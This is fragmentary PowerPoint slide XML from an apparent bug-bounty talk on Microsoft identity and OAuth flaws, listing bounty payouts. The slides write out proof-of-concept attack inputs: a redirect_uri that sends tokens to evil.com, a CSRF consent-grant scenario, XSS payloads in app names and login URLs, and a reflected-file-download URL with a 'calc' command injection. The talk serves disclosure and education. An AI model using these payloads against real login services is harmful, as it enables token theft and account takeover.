            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>right?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Let’s play with encoding a bit….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Redirect_uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%3a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>%2f%portal.office.com%252f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%2f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF00FF"/>
                </a:highlight>
              </a:rPr>
              <a:t>microsoft%2f%3f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         [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>@]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[:port]][/]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF00FF"/>
                </a:highlight>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[?query][#fragment]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*Final token is sent out to provided host, which in this case is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>evil.com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77C9-45E8-499C-9F94-FBE96BEB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20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BB0A7-A36B-47B2-9DAD-04C685D10564}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9516229" y="28592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(USD)$13,000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1D684-1BA8-43DB-A31B-E3076FCC594D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10267750" y="1621322"/>
            <a:ext cx="1768862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App Manifest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App ID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Expected Permissions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App URL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20006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29884"/>
            <a:ext cx="4893865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Authentication flow: The Consent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6239-78B7-4E4A-9E45-69EF0ACF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06" y="569979"/>
            <a:ext cx="599888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What if? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I register an app and then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Redirect_uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> == https://evil.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Profit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>. Right?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office.com is unique, so is every Microsoft app, they have implicit authorization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For any other app, explicit user consent is required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DACC8-11C2-478C-9276-A28431F0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908" y="139169"/>
            <a:ext cx="3941786" cy="5005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8901B-0E63-4772-A8FA-AB1BA5747F1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6021294" y="2516094"/>
            <a:ext cx="5142753" cy="2678331"/>
            <a:chOff x="6021294" y="2516094"/>
            <a:chExt cx="5142753" cy="2678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9124B0-EC8B-48D8-ABF4-84BDDEA753F8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8002494" y="2516094"/>
              <a:ext cx="3161553" cy="104588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761B3D-B513-4ADB-9373-ABA2F6BF5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5129" y="3012141"/>
              <a:ext cx="1129554" cy="153595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AB6A52-8E94-4DC6-941E-00492315A08E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6021294" y="4548094"/>
              <a:ext cx="136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Permission Scope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17D4823-2863-4A90-A892-DA6A44A3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21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Graphic 7" descr="Bell">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE7C0080-1778-43D3-8E10-3F42D56CC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7149" y="3331883"/>
            <a:ext cx="349623" cy="349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B14B17-C5A2-4F5E-8A10-2FB3295C27E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3833650" y="1723478"/>
            <a:ext cx="2336371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App Manifest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App ID == My App ID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Expected Permissions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App URL == evil.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21030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3BB4-5E3A-481E-92FA-9A5AE7AD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Oauth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nutshell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360A47C-AE9D-42B2-99C2-E71EDFDC2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415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96C03BF-BBF2-4AED-9077-FEFF10503B77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/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 smtClean="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22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9268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1A0FB-4FE2-4BE5-84F6-3DE18FC83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4800"/>
              <a:t>Oauth really doesn't make any sense to anyone (because it's bad, and whoever invented it should feel bad) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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20546-5C58-4D64-8C56-0D991C771253}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="4256436"/>
            <a:ext cx="9144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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>An awesome security researcher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E57A2FA6-A8CE-478A-9BAA-F61F1979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23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74930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Authentication flow: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What ifs?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6239-78B7-4E4A-9E45-69EF0ACF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05" y="569978"/>
            <a:ext cx="11381976" cy="46355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dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>&lt;form id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>frm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>" action="https://login.microsoftonline.com/common/Consent/Grant" method="post"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="33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300" u="sng" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="33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300" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Attack Scenario:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Register a malicious app with full privilege scope</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Assume victim is already logged into one of Microsoft service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Send a link to victim, which makes a POST REQUEST to consent (‘yes’) with malicious app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>App registered to victim with full privilege access without user consent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1CCA-C47C-41B8-9C05-91C1FC8A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24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Graphic 7" descr="Bell">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30B228FB-06EC-4554-B1C6-DB3F97C60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719" y="489578"/>
            <a:ext cx="425013" cy="425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2A92B-59AC-4415-A559-82C74AACE1B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9516229" y="28592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(USD)$24,000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13523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Authentication flow: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What ifs?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6239-78B7-4E4A-9E45-69EF0ACF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699247"/>
            <a:ext cx="7231530" cy="45988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600" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>The app name is not properly encoded in consent screen?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="5900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5600" u="sng" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Cross site scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="6400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5600" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Attack scenario:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Register an app </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>AppName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>test"onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>="alert(1)"param=“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Send victim link to login with your malicious app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>During auth flow XSS is executed, which can bypass consent and/or steal identity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BA123-412A-4B54-B013-5F57197F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73" y="107866"/>
            <a:ext cx="4014390" cy="5097639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F41AD085-C80D-4E5A-AC08-B01B25BE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25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3" name="Graphic 12" descr="Bell">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD035AD7-64BA-48B0-A839-712F75366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756" y="629437"/>
            <a:ext cx="392741" cy="392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7E93F-CCD9-4C81-AFBD-DC03E0A31C2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9516229" y="28592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(USD)$12,000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144216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 fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Authentication flow: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What Ifs? Its raining XSS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6239-78B7-4E4A-9E45-69EF0ACF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04" y="569978"/>
            <a:ext cx="10985451" cy="46355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4400"/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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://login.live.com/login.srf?wa=wsignin1.0&amp;wp=MBI_SSL&amp;wreply=https://login.live.com&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>username=test&lt;/script&gt;&lt;script&gt;alert('hello')&lt;/script&gt;&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>12374271</a:t>
            </a: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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://login.live.com/login.srf?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>}&amp;&amp;alert`hello`//{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>&amp;username=test@hotmail.com\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hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://login.microsoftonline.com/login.srf?wa=wsignin1.0&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>wreply=javascript:%2F%2Fportal.office.com/%250Aalert(document.domain)//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>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://login.microsoftonline.com/common/oauth2/authorize?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>redirect_uri=javascript://evil.com/?%0Aalert('XSS%20at%20'%2Bdocument.domain)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://login.microsoftonline.com/common/oauth2/v2.0/logout?p=b2c_1_ignite2017fullreg_registration_signinup&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>post_logout_redirect_uri=javascript:confirm(document.domain)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A0611-387A-4D3D-9A5B-0D23DFAA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26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Graphic 7" descr="Bell">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7B657FE-48F6-4BB9-BCED-FB5FADD0D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347" y="211204"/>
            <a:ext cx="392741" cy="392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F6AB53-3439-4D1A-A953-3664116FF8C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7117975" y="285926"/>
            <a:ext cx="4421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(USD)$5,000 to (USD)$13000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21335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6239-78B7-4E4A-9E45-69EF0ACF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04" y="569978"/>
            <a:ext cx="10985451" cy="463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/>
              <a:t>From:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>https://login.microsoftonline.com/common/userrealm/?user=xxxxxxx@gmail.com&amp;api-version=2.1&amp;stsRequest=rQIIAeNisFLOKCkpKLbS1y_ILypJzNHLT0vLTE7VS87P1csvSs9MAbGKhLgECibvPLNWa5LrNO76xYk7LqSsYlTDqVM_[...]_ggADXoqL8IqCIrpGhibmRgamBhRkA0&amp;checkForMicrosoftAccount=false</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>To:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>https://login.microsoftonline.com/common/userrealm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>/setup.bat?user="||calc||&amp;api-version=2.1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Result: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Reflected File Download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AFF33-C9A0-4CB7-BD4C-94014E01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27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9822BAB-E083-4B54-9A91-ED25D53D17FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr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Authentication flow: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What Ifs? Out of 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E12B5-ED16-48C1-8C47-3EDA709F1CA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9516229" y="285926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(USD)$7,000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291860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 fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Authentication flow: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Enterprise Vs Consumer Identity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6239-78B7-4E4A-9E45-69EF0ACF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388755"/>
            <a:ext cx="10515600" cy="247802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Enterprise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://login.microsoftonline.com/common/oauth2/authorize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> (OAUTH/OPENID/JWT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://login.microsoftonline.com/login.srf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> (WS-FED/Kerberos/SAML)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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Consumer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://login.live.com/oauth20_authorize.srf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> (OAUTH/OPENID/JWT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://login.live.com/login.srf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> (WS-FED/SAML/Base64)</a:t>
            </a:r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>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highligh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1B99-9411-4390-8DE0-6E0ABE3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28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Graphic 7" descr="Bell">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E10A5E0-F824-45AE-BE02-E722AA9AA5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80521" y="134586"/>
            <a:ext cx="392741" cy="3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48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8734-C214-4DA6-BA83-64151D4F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271" y="3794336"/>
            <a:ext cx="5728647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Microsoft Identity Bounty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picture containing indoor, cable, sitting, yellow">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC3481A8-D25F-4A9B-891D-40235E64D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" r="10719" b="3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="647373"/>
            <a:ext cx="5385130" cy="6210629"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 2203018 w 5385130"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6210629"/>
              <a:gd name="connsiteX1" fmla="*/ 5385130 w 5385130"/>
              <a:gd name="connsiteY1" fmla="*/ 3182112 h 6210629"/>
              <a:gd name="connsiteX2" fmla="*/ 3441640 w 5385130"/>
              <a:gd name="connsiteY2" fmla="*/ 6114158 h 6210629"/>
              <a:gd name="connsiteX3" fmla="*/ 3178061 w 5385130"/>
              <a:gd name="connsiteY3" fmla="*/ 6210629 h 6210629"/>
              <a:gd name="connsiteX4" fmla="*/ 1233206 w 5385130"/>
              <a:gd name="connsiteY4" fmla="*/ 6210629 h 6210629"/>
              <a:gd name="connsiteX5" fmla="*/ 1108901 w 5385130"/>
              <a:gd name="connsiteY5" fmla="*/ 6171135 h 6210629"/>
              <a:gd name="connsiteX6" fmla="*/ 178899 w 5385130"/>
              <a:gd name="connsiteY6" fmla="*/ 5637585 h 6210629"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 5385130"/>
              <a:gd name="connsiteY7" fmla="*/ 5474990 h 6210629"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 5385130"/>
              <a:gd name="connsiteY8" fmla="*/ 889234 h 6210629"/>
              <a:gd name="connsiteX9" fmla="*/ 178899 w 5385130"/>
              <a:gd name="connsiteY9" fmla="*/ 726640 h 6210629"/>
              <a:gd name="connsiteX10" fmla="*/ 2203018 w 5385130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CDE0556-E0E1-479D-93ED-D89104B944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5398355" y="1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EEAA082-575A-4809-9A88-60231940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29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2909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DA0C6-5462-49D8-AD51-B7D2865B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4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Someone wise once said</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
            </a:b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EAFA6DA-8368-4C85-A6B8-7C1F7366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3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470D473-D63D-47A7-B905-B179AC4784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4159519" y="468977"/>
            <a:ext cx="3897684" cy="35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0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894C0-96F2-45DB-A67F-330F57D5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chemeClr val="accent2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Bounty payouts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B78D60-F4CA-4814-B993-03339A285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09640"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="79828" y="-143459"/>
          <a:ext cx="12032343" cy="43430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87642">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3794033020"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2759856">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2911013873"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2968384">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="332006807"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2716461">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1351832991"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
